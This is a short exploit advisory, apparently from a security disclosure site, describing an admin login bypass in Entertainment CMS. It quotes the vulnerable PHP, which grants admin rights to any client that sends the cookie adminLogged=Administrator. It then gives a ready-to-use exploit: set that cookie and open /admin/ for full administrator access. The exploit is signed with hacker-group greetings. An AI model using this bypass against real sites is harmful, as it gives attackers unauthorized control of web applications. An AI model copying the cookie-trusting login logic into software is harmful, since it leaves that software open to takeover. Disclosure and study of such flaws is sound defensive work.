Entertainment CMS Admin Login Bypass

2007.07.14
Credit: Kw3rLn
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Entertainment CMS Admin Login Bypass Web: Entertainment CMS Demo : http://multimedia.mydlstore.net/ Download: http://rapidshare.com/files/39640099/enter-cms.rar Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Vulnerable codE: $adminOK=0; if (isset($_POST["adminUser"])) { if (($_POST["adminUser"]==$adminUser) && ($_POST["adminPass"]==$adminPass)) { setcookie("adminLogged","Administrator", NULL, "/"); $adminOK=1; } } if ((isset($_COOKIE["adminLogged"])) && ($_COOKIE["adminLogged"]=="Administrator")) { $adminOK=1; } Exploit: Set your cookie: adminLogged=Administrator then g0 to http:/site.com/admin/ and you have full admin access GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] [ RST will be back s00n ]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top